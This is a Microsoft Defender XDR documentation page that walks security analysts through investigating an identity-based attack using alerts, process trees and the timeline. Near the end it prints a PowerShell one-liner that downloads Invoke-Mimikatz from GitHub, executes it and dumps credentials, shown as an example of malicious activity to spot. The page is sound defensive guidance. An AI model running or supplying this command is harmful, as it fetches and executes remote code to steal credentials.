Skip to content

Latest commit

 

History

History
91 lines (60 loc) · 7.46 KB

first-incident-path-identity.md

File metadata and controls

91 lines (60 loc) · 7.46 KB
title description ms.service f1.keywords ms.author author ms.localizationpriority manager audience ms.collection ms.topic search.appverid ms.date
Example of an identity-based attack
Step through an example analysis of an identity-based attack.
defender-xdr
NOCSH
diannegali
diannegali
medium
dansimp
ITPro
m365-security
m365solution-firstincident
highpri
tier1
conceptual
MOE150
MET150
04/20/2021

Example of an identity-based attack

[!INCLUDE Microsoft Defender XDR rebranding]

Applies to:

  • Microsoft Defender XDR

Microsoft Defender for Identity can help detect malicious attempts to compromise identities in your organization. Because Defender for Identity integrates with Microsoft Defender XDR, security analysts can have visibility on threats coming in from Defender for Identity, such as suspected Netlogon privilege elevation attempts.

Analyzing the attack in Microsoft Defender for Identity

Microsoft Defender XDR allows analysts to filter alerts by detection source on the Alerts tab of the incidents page. In the following example, the detection source is filtered to Defender for Identity.

:::image type="content" source="/defender/media/first-incident-path-identity/first-incident-identity-mdi-filter.png" alt-text="Filtering the detection source in Microsoft Defender for Identity" lightbox="/defender/media/first-incident-path-identity/first-incident-identity-mdi-filter.png":::

Selecting the Suspected overpass-the-hash attack alert goes to a page in Microsoft Defender for Cloud Apps that displays more detailed information. You can always find out more about an alert or attack by selecting Learn more about this alert type to read a description of the attack and remediation suggestions.

:::image type="content" source="/defender/media/first-incident-path-identity/first-incident-identity-alert-example.png" alt-text="A suspected overpass-the-hash attack alert" lightbox="/defender/media/first-incident-path-identity/first-incident-identity-alert-example.png":::

Investigating the same attack in Microsoft Defender for Endpoint

Alternatively, an analyst can use Defender for Endpoint to learn more about the activity on an endpoint. Select the incident from the incident queue, then select the Alerts tab. From here, they can identify the detection source as well. A detection source labeled as EDR stands for Endpoint Detection and Response, which is Defender for Endpoint. From here, the analyst selects an alert detected by EDR.

:::image type="content" source="/defender/media/first-incident-path-identity/first-incident-identity-mde-edr.png" alt-text="An Endpoint Detection and Response in the Microsoft Defender for Endpoint portal" lightbox="/defender/media/first-incident-path-identity/first-incident-identity-mde-edr.png":::

The alert page displays various pertinent information such as the impacted device name, username, status of auto-investigation, and the alert details. The alert story depicts a visual representation of the process tree. The process tree is a hierarchical representation of parent and child processes related to the alert.

:::image type="content" source="/defender/media/first-incident-path-identity/first-incident-identity-mde-tree.png" alt-text="An alert process tree in the Microsoft Defender for Endpoint" lightbox="/defender/media/first-incident-path-identity/first-incident-identity-mde-tree.png":::

Each process can be expanded to view more details. Details that an analyst can see are the actual commands that were entered as part of a malicious script, outbound connection IP addresses, and other useful information.

:::image type="content" source="/defender/media/first-incident-path-identity/first-incident-identity-process-details.png" alt-text="The process details in the Microsoft Defender for Endpoint portal" lightbox="/defender/media/first-incident-path-identity/first-incident-identity-process-details.png":::

By selecting See in timeline, an analyst can drill down even further to determine the exact time of the compromise.

Microsoft Defender for Endpoint can detect many malicious files and scripts. However, due to many legitimate uses for outbound connections, PowerShell, and command-line activity, some activity would be considered benign until it creates a malicious file or activity. Therefore, using the timeline helps analysts to put the alert into context with the surrounding activity to determine the original source or time of the attack that otherwise is obscured by common file system and user activity.

To use the timeline, an analyst would start at the time of the alert detection (in red) and scroll down backwards in time to determine when the original activity that led to the malicious activity actually started.

:::image type="content" source="/defender/media/first-incident-path-identity/first-incident-identity-start-time.png" alt-text="Analyst's start time for the alert detection" lightbox="/defender/media/first-incident-path-identity/first-incident-identity-start-time.png":::

It is important to understand and distinguish common activity such as Windows Update connections, Windows Trusted Software activation traffic, other common connections to Microsoft sites, third-party Internet activity, Microsoft Endpoint Configuration Manager activity, and other benign activity from suspicious activity. One way to distinguish is by using timeline filters. There are many filters that can highlight specific activity while filtering out anything that the analyst does not want to view.

In the image below, the analyst filtered to view only network and process events. This filter criteria allows the analyst to see the network connections and processes surrounding the event where Notepad established a connection with an IP address, which we also saw in the process tree.

:::image type="content" source="/defender/media/first-incident-path-identity/first-incident-identity-notepad.png" alt-text="How Notepad was used to make a malicious outbound connection" lightbox="/defender/media/first-incident-path-identity/first-incident-identity-notepad.png":::

In this particular event, Notepad was used to make a malicious outbound connection. However, often attackers will use iexplorer.exe to establish connections to download a malicious payload because ordinarily iexplorer.exe processes are considered regular web browser activity.

Another item to look for in the timeline would be PowerShell uses for outbound connections. The analyst would look for successful PowerShell connections with commands such as IEX (New-Object Net.Webclient) followed by an outbound connection to a website hosting a malicious file.

In the following example, PowerShell was used to download and execute Mimikatz from a website:

IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds

An analyst can quickly search for keywords by typing in the keyword in the search bar to display only events created with PowerShell.

Next step

See the phishing investigation path.

See also